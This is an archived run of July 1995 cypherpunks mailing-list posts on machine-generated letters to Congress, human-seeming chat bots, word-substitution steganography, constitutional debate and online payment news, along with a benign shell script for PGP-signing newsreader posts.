example. The Tree Hugger CongressLetter WebPage (no trees died for this Page) will *only* render letters *against* H-9876, etc. etc. Each will return the result of the rendering to you at your email address if you don't want to copy it off the web page. *You* will send the email to your congresscritter. The process will be easy: Right now any decent programmer could write code to allow choices from Column A, B, etc. to generate a plausible letter. Generalized, this will allow the operators to create templates for each new issue, untouched by programmer hands. Enhancements will make style, grammar, spelling, punctuation variations increasingly sophisticated. -Rendering services will push email over into reality for Congress. Strangely, though the rendered letter is in large part a fabrication, it will be this ersatz form of personal communication that will finally force Congress to accept the reality of email. Even though generated by computer, the rendered letter will still be an expression of a constituent's opinion on an issue. It will rapidly become the preferred method of expression for many people who simply don't have time to make a career out of writing to politicians. -Congress will respond with automated mail tallying. Whatever chance there is that your present handwritten letter may actually be *read* will vanish completely in the age of email. Your letter will be eaten by an analyzer, acknowledged by an intelligent renderer that may even refer to passages in your letter (and may even SEEM TO AGREE WITH YOU), and then be trashed. Letters may be sidetracked if they contain certain unacceptable things, because the suits have to be kept busy, but most incoming mail will vanish after tallying. -There could be "agent" wars, but they will not be of consequence. In the beginning, the politicos may wish to commission software enhancements and intelligence gathering to enable mail scanning agents to filter out email generated by letter renderers. Developers of the analysis software may try to find vocabulary and phraseology patterns with which to arm the analysis agents to toss rendered letters aside. In the end, though, this will be a losing battle and a counterproductive one. If 50 million rendered letters come in from 50 million real voters, they had better *not* be ignored or 50 million voters will take vengeance at the polls. An expression of opinion is an expression of opinion, and the sophistication of the tools employed to generate them will be able to stay ahead of the technology for detecting them in any case. -Interaction with Congress may ultimately take the form of battling proxies. On the one side are arrayed the forces of the A party, the shining letter rendering algorithms, vocab lists, grammar rules, and the latest in provably accurate slang and misuse of the language. On the other side, the forces of the B party, with essentially similar tools. In the middle is Congress, gleaming mail analyzers polished and ready. Strangest of all is that all the effort of rendering and analyzing letters will go into the creation and consumption of communication particles that may eventually never be seen by "author" *or* "recipient." The electorate will express itself by proxy and the elected officials will divine the political winds by proxy. Voters will be hard-sold to sign up for ongoing personally authorized letter rendering, so they can go fishing. Congresscritters will be assured that the analyzers will figure out which way the winds are blowing, so they can go fishing. May the best proxy win. Maybe voter and congresscritter will meet somewhere, fishing, and actually *communicate*. Perish the thought! >>Another factor that would make it appear more authentic would be spelling >>and grammar errors. The grammar errors could be built into the rant >>generators... There has been a BBS "door" available for several years that does this convincingly... if you're a sysop and run a "sysop chat" door but want to play mind games when you're not available, SHAMPAGE will answer the user's request to page the sysop and chat with him or her. It is configurable to recognize keywords and make random selections from lists of responses to those keywords. It converses believably as if it were a somewhat distracted, tired and disjoint human being. I saw a log of a SHAMPAGE session in which a caller never realized he was conversing with a robot. It kept calling attention to the late hour and the caller kept apologizing for the intrusion and asking for a file he needed. As luck would have it, the random utterings and random selections of responses to keywords were often right on the mark. Too weird! After several hundred lines of chat the caller finally gathered that the "sysop" was really pissed at being kept up so late and logged off, somewhat offended himself. SHAMPAGE typed in real time, with humanlike varying inter-keystroke timing, and makes "typos." It "noticed" its mistakes a few keystrokes later and backspaced to correct them. It typed "hte" instead of "the" and "ign" instead of "ing." It was a riot. With some enhancement it would be completely believable even to the forewarned caller. I've also seen an incomplete attempt to bring the ELIZA concept up to date and implement it as a BBS door. Though it typed line-at-a-time like a BBS teleconference, it still managed to confuse callers into thinking it was a real person by simple tricks of inverting pronouns and such. It, like the chat door, seemed to be uncanny at randomly choosing just the right thing to say to cinch the caller's presumption that it was a human being. Bolivar From tj at compassnet.com Wed Jul 19 00:49:06 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Wed, 19 Jul 95 00:49:06 PDT Subject: Stego-Rants ? Message-ID: Which of the following is the cleartext? ---------------------------------------- 1. Bit and byte dropout can significantly impede communication. 2. Flower and shrub planting can greatly enhance landscaping. 3. Word and phrase substitution can hopelessly disguise meaning. 4. UFO and space-alien belief can seriously damage credibility. If you *presume* my context, you easily identify (3). If only the wordlists that translate between (1), (2) and (4) were available for your inspection, you would be up the creek but you wouldn't know it. Yes, this is aba's "exxon" at work again, and yes, it seems to me that deniability through other-plausible-meaning is viable as a form of stego. Grammatical correctness is easy to maintain, and care in choosing words can preserve much apparent meaning. Bolivar From bart at netcom.com Wed Jul 19 01:39:17 1995 From: bart at netcom.com (Harry Bartholomew) Date: Wed, 19 Jul 95 01:39:17 PDT Subject: Automatic Rant generator In-Reply-To: Message-ID: <199507190837.BAA21204@netcom18.netcom.com> Jonathan Blake wrote: > > Actually, True Type fonts of your handwriting are available, > for any platform that accepts that font type. I don't have > the URL for them, but there is a pointer to it at > HTTP://www.ntu.ac.sg/~tjlow/gclub.html The URL itself is: Turning Personal handwriting into TrueTypeFont (http://execpc.com/~adw/). It includes an interesting .gif file of the producer's handiwork, but alas such a font costs $99. > > Using it would play hell for handwriting analysts, though. > And if it was programmed to change the pen pressure as well > --- the possibilities are staggering. Can a pen plotter > change pressure? > Uh, no one can't change pen pressure, but I think it can be mimicked. If the effect one seeks of changing pen pressure is to vary the line width or ink deposited onto the paper then varying speed, and/or overwriting with or without offset can achieve interesting effects. If I recall correctly, the HP pen position is addressable to 0.001" resolution, (though not accuracy.) I recall creating some nice effects with multiple pen colors offset by a few mils in x and y. From liberty at gate.net Wed Jul 19 02:59:32 1995 From: liberty at gate.net (Jim Ray) Date: Wed, 19 Jul 95 02:59:32 PDT Subject: Root Causes Roots cont. Message-ID: <199507190957.FAA45561@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Professor Froomkin writes: >I always understood "writing code" as in "cypherpuks write code" >to mean computer code, that is FORTRAN, C++, assembler, perl or >whatever. I understand "writing IN code" to be the use of >cryptographic tools such as codes or cyphers. Sorry I misunderstood you, professor. I had always heard those "computer codes" you mention referred to as "computer languages," and I thought of "code" as refering to use of cryptography software like Nautilus or (of course) PGP. A quick skim of your interesting article reveals that this "code" vs. "language" terminology nitpicking is no-doubt as important to you as it is to me, as we both know that's where legal and political debates are won and lost. I freely admit my "excess of libertarian paranoia," [though I prefer to term my feelings "healthy respect for world history"]. NOTE: I have always been computer-and-math-impaired compared to others who have been on this list much longer, so I'm *certainly* no final authority as to what stuff should be called. A later post indicates the professor's interesting article is at: www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html >Thus my claim >that the right to write IN code may have existed in the 1790s, >but the right to write [computer] code could not (since there >were no computers). Or alternating current [thank you, Mr. Tesla]. The founders anticipated inventions such as both of these in Article 1, Section 8. >Of course, I could be wrong about this, >since however you define it, it's debateable whether I'd pass the >code test to qualify as a cypherpunk, since I stopped writing >code when I gave up programming for lawyering, and I didn't start >writing in code when I started writing about codes. I'd certainly flunk *any* C-punk test, unless it involves just writing IN code by using PGP for both encryption and authentication, or the warm feeling I get in my heart for Phil Zimmermann. > >In any case it's a matter of definitions, not timelines. > >Note: I am not suggesting that the right to write code lacks >constitutional protection; just that the protection wouldn't >come from the 9th amendment. Agreed. As my earlier post (sadly) admitted, the 9th is *NOT* in vogue these days. I also said that since the 9th is so universally ignored, it just clutters-up the rest of the Bill of Rights and [perhaps] it therefore should be repealed. The people who say, "The 9th Amendment means nothing," or "it has no teeth," seem to be the same folks most reluctant to even *discuss* repeal, perhaps because discussion would inevitably bring publicity to those of us who support a 9th Amendment *with* _plenty_ of teeth. For _much_ better "forgotten 9th" scholarship than my random thoughts on this list, I suggest the kind and cooperative "market liberal" folks at the suddenly-influential CATO Institute, located at URL: http://www.cato.org/main/ JMR Regards, Jim Ray "It is dangerous to be right when the government is wrong." Voltaire -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMAxxpG1lp8bpvW01AQG4TwP7BDhULQdsfbruwK59t+0s7NtkIZDfARl6 boKTQ1qbO8hQkEQJ+8d0L9p2RHmDlbS/MEwEY68sLRUT1MiP2ybT9UcHK/TPbial aOVLZLprWqVW2sAL+gx7A3JPsGYdY/s8ZVllsX1xxH52btoaish890OOG/3e7v7r afHBEWfP6k4= =3F7U -----END PGP SIGNATURE----- From perry at imsi.com Wed Jul 19 04:28:21 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 19 Jul 95 04:28:21 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <8AD747E.00030001AC.uuout@famend.com> Message-ID: <9507191128.AA18103@snark.imsi.com> MONTY HARDER writes: > PE> would be discerned by a staffer in moments. Crap like this is called > > They should know, because they send form letters to constituents all > the time, only they don't bother to vary it a bit. Misdirection. This has nothing to do with my point. The staffers will STILL toss your stuff. > PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts. > > Meanwhile, back at the ranch. In other words, you are choosing to ignore me. Regardless of whether you are paying attentoion, however, you will still not be able to alter the facts of life in Washington. > .. If one of our DC members can set up an > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to Perhaps people who can be bothered to spell out "folks" properly also are willing to write letters that will be paid attention to. As you seem to prefer to ignore the fact that you will be ignored, why are you willing to spend effort setting up an "Imail[sic]-FAX gateway"? .pm From bdolan at use.usit.net Wed Jul 19 04:51:23 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Wed, 19 Jul 95 04:51:23 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <9507191128.AA18103@snark.imsi.com> Message-ID: FWIW: The Christian Science Monitor ran an article a week or so ago, reporting that Congressional mail loads have doubled in the last three years, that it's inconvenient to deal with all that mail, and nobody is paying any attention to their mail any more. I've never had a meaningful response from any of my (non-) representatives. Representative government, hah! bd On Wed, 19 Jul 1995, Perry E. Metzger wrote: > > MONTY HARDER writes: > > PE> would be discerned by a staffer in moments. Crap like this is called > > > > They should know, because they send form letters to constituents all > > the time, only they don't bother to vary it a bit. > > Misdirection. This has nothing to do with my point. The staffers will > STILL toss your stuff. > > > PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts. > > > > Meanwhile, back at the ranch. > > In other words, you are choosing to ignore me. Regardless of whether > you are paying attentoion, however, you will still not be able to > alter the facts of life in Washington. > > > .. If one of our DC members can set up an > > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to > > Perhaps people who can be bothered to spell out "folks" properly also > are willing to write letters that will be paid attention to. As you > seem to prefer to ignore the fact that you will be ignored, why are > you willing to spend effort setting up an "Imail[sic]-FAX gateway"? > > .pm > From ab411 at detroit.freenet.org Wed Jul 19 04:58:10 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Wed, 19 Jul 95 04:58:10 PDT Subject: Automatic Rant generator Message-ID: <199507191158.HAA20377@detroit.freenet.org> Jonathon Blake writes: [ Various words of Tim May, Martin Hamilton, Monty Harder, Harry Bartholomew, and myself elided. ] [ Re: plotters and Metafonts: ] > > Making the little problem Tim presents, a major headache for > somebody else --- handwriting analysts. >... > Actually, True Type fonts of your handwriting are available, > for any platform that accepts that font type. > It needs to be more complicated than this, however, because if just a font is used then each 'e' looks like every other--easy to detect. > Tim May > Of course this is also similar to the "style > Tim May > detectors" we so often talk about. > > I don't remember the program name, but there is software > available now, that analyzes a document, and figures out who > wrote it --- based on the frequency count of the letters of > the alphabet. Secondary measures are frequency counts of > letter pairs. Words, phrases, sentences etc are totally > ignored. So what you'd need to do here, to pass your pseudo- > Turing Test is a program that generates different statistical > results, for allegedly different people. Interesting. I've not heard of this. The situation bears a great similarity to stego--you need to emulate a statistical pattern to make it undetectable, and if your opponents statistics are more sophisticated than yours, you'll be found out. [ Re: Introducing simulated spelling and typographical errors: ] > > Actually, the usual give away, is in letter and letter pair > frequencies --- not spelling mistakes, grammatical errors, > etc. > > However, there a technique called _Scientific Content > ANalysis_ that looks at how things are said, to judge their > "truthfulness." A good program will not show that the text > was randomly generated, nor show that the author is off-the- > wall, so to speak. Then again, what are the chances that Congressional staffers will be using such sophisticated methods to sort out the 'astroturf'? If a staffer is suspicious but then sees "recieved" and "I been" and "heplful" and decides, "Okay, this was written by a human," well, that's Good Enough for Government Work, as they say. -- David R. Conrad, ab411 at detroit.freenet.org, http://web.grfn.org/~conrad/ Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From trei Wed Jul 19 06:16:28 1995 From: trei (Peter Trei) Date: Wed, 19 Jul 95 06:16:28 PDT Subject: Stego-Rants ? Message-ID: <9507191316.AA14859@toad.com> > Which of the following is the cleartext? > 1. Bit and byte dropout can significantly impede communication. > 2. Flower and shrub planting can greatly enhance landscaping. > 3. Word and phrase substitution can hopelessly disguise meaning. > 4. UFO and space-alien belief can seriously damage credibility. > If you *presume* my context, you easily identify (3). If only the wordlists > that translate between (1), (2) and (4) were available for your inspection, > you would be up the creek but you wouldn't know it. > Yes, this is aba's "exxon" at work again, and yes, it seems to me that > deniability through other-plausible-meaning is viable as a form of stego. > Grammatical correctness is easy to maintain, and care in choosing words can > preserve much apparent meaning. > Bolivar This class of code is fairly old. In 'The Codebreakers' an incident is recounted (I think from WW2). A suspected spy in the US was sent a cable from overseas, reading 'Our father is dead'. This was intercepted, and the censors, suspecting a stego'd message, substituted 'Our father is deceased'. The suspected spy immediatly sent back 'Is father dead or deceased?', and was arrested. The book contains many fascinating stories of stego and attempted stego, including mailed knitting patterns, crossword puzzles, drawings, sports statistics, etc. On the eve of Pearl Harbour, the wife of a Japanese diplomat in Oahu sent a long message to Japan describing in detail the many kinds of flowers blooming at that time in Hawaii. It was sent through non-diplomatic channels, and authorities suspecting it contained stego, failed to deliver it. After the war it came out that she did regular gardening columns for a Japanese magazine, and the message was entirely innocent. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation trei at process.com From rsalz at osf.org Wed Jul 19 06:57:47 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 19 Jul 95 06:57:47 PDT Subject: Stego-Rants ? Message-ID: <9507191352.AA20325@sulphur.osf.org> > From: "Peter Trei" > The book contains many fascinating stories of stego and attempted > stego, including mailed knitting patterns ... It was the best of times, it was the worst of times. /r$ From rsalz at osf.org Wed Jul 19 07:23:36 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 19 Jul 95 07:23:36 PDT Subject: Commercenet document on cryptography Message-ID: <9507191417.AA20396@sulphur.osf.org> > http://www.commerce.net/information/position/position.062695.html Thanks to Steven for mentioning this -- it's a great paper. Send it to your gov't representatives. /r$ From nobody at valhalla.phoenix.net Wed Jul 19 07:25:22 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Wed, 19 Jul 95 07:25:22 PDT Subject: Secure Courier and Amex Card Message-ID: <199507191425.JAA14052@ valhalla.phoenix.net> Mountain View, Ca., July 18 -- With the support of Intuit and MasterCard International, Netscape Communications has announced Secure Courier, an open, cross-platform digital envelope. The new protocol allows secure transfer of credit card, debit card and micro-transactions across the Internet. Secure Courier is an open, cross-platform protocol, meaning it will operate in Macintosh, Windows, and Unix operating environments common to Internet traffic. Specifications for this new protocol are currently available from Netscape's World Wide Web site at http://home.netscape.com/newsref/std/credit.html . _________________________________________________________ New York, NY, July 18 -- American Express' Travel Related Services Company said it is establishing relationships with four technology companies for secure Internet credit card transactions using the American Express card and the Optima card. The four companies involved, CyberCash, First Virtual Holdings, Netscape Communications Corporation, and Open Market, have different ways of securing transactions over The Internet's World Wide Web. From Michael at umlaw.demon.co.uk Wed Jul 19 08:19:59 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Wed, 19 Jul 95 08:19:59 PDT Subject: Root Causes Roots cont. Message-ID: <2561@umlaw.demon.co.uk> As my final word on this thread, let me say that if you are really interested in the 9th Amendment, by far the best legal article on the subject that I know of is Charles L. Black, Jr, On Reading and Using the Ninth Amendment. I have not visited the Cato web pages, but their journal tends to be on the shallow side. I am far from LEXIS right now so I can't give you a citation for the Black article, but it is brilliant. It would also make a libertarian's hair stand on end. For hours. -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 Rain. Sun. Rain. Sun. Rain. From tcmay at sensemedia.net Wed Jul 19 09:14:53 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Wed, 19 Jul 95 09:14:53 PDT Subject: Stego-Rants ? Message-ID: At 7:57 AM 7/19/95, Douglas B. Renner wrote: >Just a few thoughts: > >1. Use the randomness in a computer generated piece of English text to >hold your real message, encrypted, and obscured. > >2. Even more entertaining would be if the foreground text could somehow >be contrived to be meaningful. I know this would be a "good trick" but >I'd conjecture that it's possible. Imagine fractal compression of a text >file, with the decompression routine adding some "randomness" which would >be your message, obscured at a very abstract level. Depending on how >much "randomness" was added, I'm wondering if the resulting text might >possibly retain some of its original legibility (?) I am assuming that >a companion fractal re-compressing routine would be required to retrieve >the cypher. > >(I am looking at an ad for a graphics program, "Images Incorporated" by >Iterated Systems which with fractal techniques can achieve 100:1 >compression -- and then -- decompress to 8 times the original bitmap size >with minimal added distortion.) But fractal compression schemes are usually _lossy_, that is, some of the original bits are irretrievably lost. (This should be clear also from the amount of compression achieved....multiple files/images compress to the "same" smaller file--by the "pigeonhold principle.") Lossy compression is often OK for visual images and audible files, a la music, but would be pretty bad for any scheme dependent on encryption. (Not totally out of the question, as error correction could be used to maybe construct the critical bits, but then there's a messy battle going on between lossy compresssion to get more bit density and adding bits for error correction...) --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From adam at bwh.harvard.edu Wed Jul 19 09:21:13 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 19 Jul 95 09:21:13 PDT Subject: Govt mandated key In-Reply-To: Message-ID: <9507191620.AA22218@leonardo.bwh.harvard.edu> | I wouldn't register my keys and I don't think ANY of us should either. | If they threatened me W/ RICO, I would probably register *A* key but | certainly not one I EVER indended to actually use. | In a case like this I think massive civil disobediance would be a good | response. Registering 2^128 keys is just as good a form of civil disobedience as refusing to co-operate. Who was it that said the best remedy to a bad law is for it to be strictly enforced? I think after I register my 2^128 keys (in random order, of course), I shall from time to time request copies of particular keys to ensure that they are keeping mine on file. Actually, I think I can reasonably be expected to use both IDEA and 3DES, so I shall also register 2^196 3DES keys. To simplify the goverments indexing of these keys, one could also generate key identifiers to will identify each message with on the outside. These unrelated numbers would double or triple the number of bits that would have to be stored. Storing or transmitting them might be a bit of a problem, but I'll expect government assistance in finding a storage medium that can hold more bits than the number of atoms in the universe. Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From adam at bwh.harvard.edu Wed Jul 19 09:44:55 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 19 Jul 95 09:44:55 PDT Subject: TIME pathfinder registration In-Reply-To: <199507180059.UAA12182@detroit.freenet.org> Message-ID: <9507191640.AA22426@leonardo.bwh.harvard.edu> What a pain to type. writecode is easy, and since its been used once, should be used again. Trying three or four passwords to get (vaugely) anonymous access is silly. A | >This was me. The password is "writecode", since Pathfinder didn't allow | >the login and password to be the same. | Perhaps in the future people might use "sknuprehpyc" in such cases? | And of course, don't put the list's email address in. From vznuri at netcom.com Wed Jul 19 10:04:39 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 19 Jul 95 10:04:39 PDT Subject: cypherpunk "Zen" victories Message-ID: <199507191703.KAA20332@netcom23.netcom.com> I was recently marvelling at how much the "cypherpunk agenda" is being advanced even in light of what would seem to be setbacks. Particularly in the area of anonymous remailers. We now have a very major article on remailers and Julf's setup in the NYT that portrays them in an unbiased, unhysteria-stricken mode. Also in the article, it quotes the police as regretting their falling victim to Scientology manipulation and investigating the remailer "without cause". A major officer is quoted as saying, roughly, "we are going to need a crime before we investigate in the future". Look what we got out of this: 1) incredible positive publicity for Julf, Hero of the Net 2) introduction of the concept of anonymous remailers to the layman 3) police awareness. increased reluctance to go on anonymous remailer witchhunts. advice to other police to do the same. 4) only *one* address was compromised on Julf's system. a small price to pay for all this 5) Time Magazine also did an article on Julf a few months ago and this compromise in identity. *astonishing* publicity. All in all, I would say the effect was an overall "net positive". It reminds me of a zen-like saying, "sometimes you lose by winning and win by losing". It would seem on the face of it that the Helsingius Affair was a debacle from the point of view of pseudonymity. However I would consider it a extraordinary success. The major foes of pseudonymity have so far been misguided police forces in Finland, who now say they resent the solicitude of the US into their own affairs, and would not be so eager to cooperate in the future; another foe is a radical religious cult that is finding its own set of 20th century heretics, and attempting to excommunicate them. In the meantime, with each exposure, the idea of anonymity and pseudonymity is gaining powerful friends. Also, a long time ago a major foe of anonymity was Dick Depew. An article came out on him in the WSJ that made him look awfully silly. He is roundly considered one of the more legendary net crackpots today. === I'd also like to point out that the recent Rimm job affair is another "net positive" for the net. Rimm has been so utterly thoroughly discredited and blackened by his own personality and background, as reported by Brock Meeks recently, it is amazingly hilarious. Rimm has become the laughingstock of cyberspace in the way that Cantor and Siegal were We could not have asked for a better setup for embarrassing and humiliating the media into realizing the core issues involving pornography on the internet. If someone did this intentionally, it would have been considered a brilliant trap. Time and DeWitt have been savaged by very reputable people, and I'm sure they consider the article a fiasco from a credibility standpoint. Any magazine that covers pornography in cyberspace in the future will be very gunshy and will not be so flippant, if they can stand poking the hornet's nest at all. === Another area is in the bills that are being introduced in congress. It would seem these are a fiasco from the point of view of those interested in cyberspace. But there are backlashes even in congress. Was it Markey that introduced a bill that made cyberspace off limits to future draconian legislation? All this also forces legislators to figure out what the hell they are dealing with, and they are finding out what their own authority in the matter is. I think the wise ones may figure out that if they don't play nice, we may take our marbles away and go play with someone else. D.Frissell said something profound in his letter to the editor, "Congress thinks the Internet can be controlled. We who built it, and continue to build it, think it cannot be. It will be interesting to see who is right". His comparing it with the ideas in the declaration of independence, that "when a government no longer serves the people, they have a right to overthrow it", is extremely apropos in cyberspace, where it may be more possible than ever for those who desire freedom to make those who are apposed to it, completely irrelevant. T.May suggest that we just give up the fight in congress, saying that bills can be introduced faster than we can fight them. I agree with the observation but not the conclusion. Bills have a very hard time getting to be law. They are very fragile in initial stages, and at these points they can indeed be killed with a little pressure in the right spots. We are learning where those spots are. At this point I think it is not in the interests of those promoting cyberspace to try to evade congress. So far, it has not proved itself to be completely hostile to the point of trying to shut down cyberspace to the degree it does not fit its own agenda. And as long as they are not outright enemies, some could be turned into powerful promoters. The idea of abandoning educating/influencing congress entirely seems like a kind of unhealthy nihilism to me. There are allies in congress and there are people listening there. Their unawareness seems amazingly proportional to the cluelessness of the general population about cyberspace (and I see extremely encouraging signs both are rapidly diminishing). The bills seem to becoming more desperate and draconian in their language. This is a sign of fear and dread on the side that seeks to regulate bits. They are in a tricky position, because the more draconian the language, the less likely it is to be passed and taken seriously. People become suspicious and hypersensitive to the infractions. To a large degree, many parts in the government only gain their power through secrecy. As people become more aware of the power flow, they disrupt and seize it themselves. Every bill that has more desperate language is the other side revealing their secret agenda, to control thought, which I think reasonable people are increasingly considering and recognizing as bogus and bankrupt. Congress will eventually polarize into being generally promoting of cyberspace, or outrightly hostile to it. Cyberspace will inevitably escape its grip if congress goes in this direction. To use Zen analogies again, there is the idea that water is the most powerful force on the earth, because it simply flows around that which opposes it. I find that cyberspace is wholly analogous. In fact it seems to me that cyberspace would give Lao Tzu a whole new cuttingly apt metaphor for his philosophies!! === So the next time that you rant about how some bill or another means the Death of the Net, or the police investigating a remailer means the downfall of cryptoanarchy, or a lousy article with a zillion distortions comes out, think again. The greatest cypherpunk victories are emerging through what would appear at first to be the "blackest" moments. viva la cryptoanarchy!!! ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ \ / ~/ |\| | | |> | : : : : : : Vladimir Z. Nuri : : : : \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html From hayden at krypton.mankato.msus.edu Wed Jul 19 10:26:42 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Wed, 19 Jul 95 10:26:42 PDT Subject: TINSIGN: Simple script for PGP signing messages in Tin 1.22 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Howdy, me again. In keeping with my wish to make PGP signing of transmissions simple and commonplace, I've got another script for y'all. This is for the Tin Newsreader. I hope you find it useful. Comments appreciated. ============================================================ #!/bin/sh # TinSign v1.0 # Written by Robert A. Hayden # Based in part on the PGP editor wrapper, Version 1.0 (editpgp) # Copyright (c) 1994, Mark Lewis . # TINSIGN is a simple program that will allow you to automatically sign # your news messages composed with the TIN 1.2pl2 news reader. It # may also work with other news programs, but it has not been tested. # INSTRUCTIONS FOR CONFIGURING TIN # # You need to define the following options in Tin. This is done via # editing the $HOME/.tin/tinrc file. # # A) start_editor_offset=ON # B) default_editor_format= +%N %F # Example: /users/foo/bar/tinsign +%N %F # C) default_sigfile=/dev/null # NOTE: I have been unable to get my copy of tin to read # any file other than $HOME/.signature, no matter # what this parameter is set to. The solution I # found was to remove $HOME/.signature and create # another file that is read in by defining the # variable below. You may want to experiment with # this to find out what works best for you as this # might be a bug specific to our local compilation. # INSTRUCTIONS FOR CONFIGURING TINSIGN # # The PGP program must be in your path, and the PGPPATH environment # variable must be defined. See the PGP documentation for details. # # In addition to PGP and the editor you define, TinSign also will use the # following programs: # awk # cat # echo # egrep # mv # rm # sleep # # Double check that the first line of this program points to sh. # # Execute the command "chmod 700 ". # # Edit the SIGPATH and TINEDITOR variables to point at your signature # (if any) and the editor you wish to use for your Tin messages. Default # signature will be the file .signature-tin in your $HOME directory. # Default editor is pico -z -t. # # Define SIGPATH=/dev/null if you do not have an ASCII signature to # append. SIGPATH=$HOME/.signature-tin TINEDITOR='pico -z -t' # INSTRUCTIONS FOR USING TINSIGN # # When you compose a message, you will compose your message as normal. # # When you exit your editor (control-X in Pico), you will receive a # prompt asking for your PGP passphrase. Type this in. # # At this point, if you have defined one, your ASCII signature will be # appended to the message AFTER the digital signature. # # You will then be put into the Tin menu asking if you wish to edit your # posting some more, quit the post (ie, abort it), or post it. ### DO NOT TAMPER BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ### # Define internal variables filename=`echo $2 | cut -f$# -d' '` tmpdir=/tmp #Run editor $TINEDITOR +$1 $2 # Split the headers from the body of the article awk '{ print }; /^$/ { exit }' $filename > ${tmpdir}/tmp$$.hdr awk 'body == 1 { print }; /^$/ { body=1 }' $filename > ${tmpdir}/tmp$$ # Remove "--" egrep -ve '^--$' ${tmpdir}/tmp$$ > ${tmpdir}/tmp2$$ mv ${tmpdir}/tmp2$$ ${tmpdir}/tmp$$ # Sign the message pgp -sat +comment="PGP Signed with TinSign 1.0" +clearsig=on ${tmpdir}/tmp$$ if [ $? -eq 0 ]; then cat ${tmpdir}/tmp$$.hdr ${tmpdir}/tmp$$.asc > $filename else echo ""; echo "*Error in signing. Aborted." sleep 5 fi # clean up any files in temp space rm -f ${tmpdir}/tmp$$.hdr ${tmpdir}/tmp$$.asc ${tmpdir}/tmp$$ # append your ASCII signature to the message echo " " >> $filename cat $SIGPATH >> $filename -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.1 iQCVAwUBMA1AZjokqlyVGmCFAQGv4QP/XB8BU91sU0KlzWTKkyZaW4j2KYKDzGin SgbFtdd9KdcoalhLU0myzOvMcpr3QAhAbaXN4Zq56IE/OYm5WL0MUJnJ6GF7kdEc F2r0vC9Nt7iZrWoG7LsqJrKrlLDp8eFhcWrpkwhH7trWA2jAjqHzof4Gy0fr8LD0 Xc1KEPpQ+JA= =Jsj3 -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From tj at compassnet.com Wed Jul 19 10:27:12 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Wed, 19 Jul 95 10:27:12 PDT Subject: Stego-Rants ? Message-ID: Peter Trei wrote: >> Which of the following is the cleartext? >> 1. Bit and byte dropout can significantly impede communication. >> 2. Flower and shrub planting can greatly enhance landscaping. >> 3. Word and phrase substitution can hopelessly disguise meaning. >> 4. UFO and space-alien belief can seriously damage credibility. >> (deletia) >> Bolivar > >This class of code is fairly old. Thank you. I would never have suspected. I grew up in Heinlein's barrel, fed through a hole in the side, until I was 18. >(deletia> >The suspected spy immediatly sent back 'Is father dead or deceased?', >and was arrested. > >The book contains many fascinating stories of stego and attempted >stego, including mailed knitting patterns, crossword puzzles, >drawings, sports statistics, etc. >(deletia) (shrug). The point is not whether people have used this before, or how cute the anecdotes of wartime failures or detections. The point is that everyone uses language in innumerable explainable contexts, and that we have computers with which to effortlessly transform text into other text. There is no need to knit, or invent crossword matrices, concoct drawings, or fabricate verifiable sports statistics. With word substitution, anything can mean anything. I never suggested it take the place of encryption, or that I thought it a new form of stego. The implications may be new in the context of ubiquitous high-speed computers and electronic communication, in that the evidentiary value of written language can be shown to be so malleable as to be useless. For example, how would you like to have to ascribe particular meaning to the accumulated notes and files of someone who 